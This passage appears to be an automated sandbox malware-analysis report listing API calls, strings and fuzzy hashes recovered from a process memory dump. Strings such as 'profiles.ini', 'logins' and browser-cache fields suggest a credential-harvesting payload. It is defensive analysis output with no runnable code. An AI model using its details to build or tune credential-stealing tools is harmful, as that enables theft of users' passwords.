                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                • memcpy.MSVCRT ref: 004133FC
                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                Strings
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 829165378-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                • memcpy.MSVCRT ref: 004115C8
                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-2887671607
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1043902810-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                • memcpy.MSVCRT ref: 0040E407
                                                                                                                • memcpy.MSVCRT ref: 0040E422
                                                                                                                • memcpy.MSVCRT ref: 0040E43D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                • API String ID: 3073804840-2252543386
                                                                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 2899246560-1542517562
                                                                                                                • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3330709923-517860148
                                                                                                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                • memset.MSVCRT ref: 0040806A
                                                                                                                • memset.MSVCRT ref: 0040807F
                                                                                                                • _wtoi.MSVCRT ref: 004081AF
                                                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                • memset.MSVCRT ref: 004081E4
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                • String ID: logins$null
                                                                                                                • API String ID: 3492182834-2163367763
                                                                                                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                • String ID: ---
                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0041087D
                                                                                                                • memset.MSVCRT ref: 00410892
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1010922700-0
                                                                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
